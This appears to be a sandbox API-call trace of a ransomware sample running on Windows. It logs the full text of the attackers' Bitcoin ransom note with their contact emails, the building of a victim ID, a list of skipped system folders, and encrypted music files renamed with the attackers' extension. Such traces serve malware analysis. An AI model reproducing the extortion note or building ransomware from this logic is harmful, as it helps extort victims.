	[0192.323] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\HELP_DECRYPT_YOUR_FILES.TXT") returned 78
	[0192.323] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.324] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0192.324] WriteFile (in: hFile=0x2c0, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0192.327] CloseHandle (hObject=0x2c0) returned 1
	[0192.327] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.328] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0192.329] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0192.329] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.329] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0192.329] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0192.329] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0192.330] CloseHandle (hObject=0x2c0) returned 1
	[0192.330] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.330] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.370] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0192.372] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\HELP_DECRYPT_YOUR_FILES.HTML") returned 79
	[0192.372] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.373] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0192.373] WriteFile (in: hFile=0x2c0, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0192.375] CloseHandle (hObject=0x2c0) returned 1
	[0192.376] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.376] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.377] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0192.378] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0192.378] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.379] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0192.379] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0192.379] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0192.379] CloseHandle (hObject=0x2c0) returned 1
	[0192.379] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdafd4140, ftCreationTime.dwHighDateTime=0x1d967cc, ftLastAccessTime.dwLowDateTime=0x8c275e70, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c30e7d8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0192.380] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*") returned 54
	[0192.380] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.380] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*", cchLength=0x36 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*") returned 0x36
	[0192.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.380] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="windows") returned 0x0
	[0192.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.381] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="boot") returned 0x0
	[0192.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.381] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="system volume information") returned 0x0
	[0192.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.381] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0192.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.382] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="temp") returned 0x0
	[0192.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.382] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="program files") returned 0x0
	[0192.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.382] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="program files (x86)") returned 0x0
	[0192.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.382] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="appdata") returned 0x0
	[0192.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.383] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="application data") returned 0x0
	[0192.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.383] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="winnt") returned 0x0
	[0192.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.383] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="tmp") returned 0x0
	[0192.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="cache") returned 0x0
	[0192.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="temporary internet files") returned 0x0
	[0192.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="webcache") returned 0x0
	[0192.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="inetcache") returned 0x0
	[0192.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="nvidia") returned 0x0
	[0192.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="packages") returned 0x0
	[0192.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="cookies") returned 0x0
	[0192.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="programdata") returned 0x0
	[0192.386] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0192.386] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0192.386] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdafd4140, ftCreationTime.dwHighDateTime=0x1d967cc, ftLastAccessTime.dwLowDateTime=0x8c275e70, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c30e7d8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0192.386] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0192.386] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bccc4aa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8bccc4aa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bcf294e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3df0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0tl74kvj.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="0TL74K~1.SCL")) returned 1
	[0192.386] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bd3ec18, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8bd3ec18, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bd64ed8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xbdf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2fzsan9cbqsfz _9.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="2FZSAN~1.SCL")) returned 1
	[0192.386] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c30e7d8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c30e7d8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c334b0e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0192.386] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c29c062, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c29c062, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c29c062, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0192.386] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bdb122e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8bdb122e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bdb122e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7910, dwReserved0=0x0, dwReserved1=0x0, cFileName="kexa.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="KEXAMP~1.SCL")) returned 1
	[0192.387] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8be23999, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8be23999, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8be49baa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xe040, dwReserved0=0x0, dwReserved1=0x0, cFileName="tkww00x4od.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="TKWW00~1.SCL")) returned 1
	[0192.387] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8be97145, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8be97145, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8be97145, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x6470, dwReserved0=0x0, dwReserved1=0x0, cFileName="v8f8_.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="V8F8_M~1.SCL")) returned 1
	[0192.387] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c275e70, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c275e70, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c275e70, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x69f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x0brndlbb4dbqtczopao.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="X0BRND~1.SCL")) returned 1
	[0192.387] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c275e70, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c275e70, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c275e70, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x69f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x0brndlbb4dbqtczopao.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="X0BRND~1.SCL")) returned 0
	[0192.387] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0192.387] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0192.388] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b57f153, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b57f153, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b5a5446, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x11d90, dwReserved0=0x0, dwReserved1=0x0, cFileName="ibsr-q.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="IBSR-Q~1.SCL")) returned 1
	[0192.388] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b63ddaf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b63ddaf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b6640be, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xe820, dwReserved0=0x0, dwReserved1=0x0, cFileName="qlk2er5ibu4cw97.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="QLK2ER~1.SCL")) returned 1
	[0192.388] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b6d65b3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b6d65b3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b6d65b3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x41e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tw0gech.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="TW0GEC~1.SCL")) returned 1
	[0192.388] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b722e42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b722e42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b722e42, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x11350, dwReserved0=0x0, dwReserved1=0x0, cFileName="um41juevttvcc2z.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UM41JU~1.SCL")) returned 1
	[0192.388] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bb28bc7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8bb28bc7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bb28bc7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="v-rzbut.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="V-RZBU~1.SCL")) returned 1
	[0192.389] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bb28bc7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8bb28bc7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bb28bc7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="v-rzbut.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="V-RZBU~1.SCL")) returned 0
	[0192.389] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0192.389] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0192.389] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b06e02f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b06e02f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b09462f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5930, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3h3uvqnynsqrnc.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="3H3UVQ~1.SCL")) returned 1
	[0192.389] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8849dad0, ftCreationTime.dwHighDateTime=0x1d9741f, ftLastAccessTime.dwLowDateTime=0x1afbe8b0, ftLastAccessTime.dwHighDateTime=0x1d97451, ftLastWriteTime.dwLowDateTime=0x1afbe8b0, ftLastWriteTime.dwHighDateTime=0x1d97451, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4 WeFFAYw8qt-MRv", cAlternateFileName="4WEFFA~1")) returned 1
	[0192.390] lstrcmpW (lpString1="4 WeFFAYw8qt-MRv", lpString2="..") returned 1
	[0192.390] lstrcmpW (lpString1="4 WeFFAYw8qt-MRv", lpString2=".") returned 1
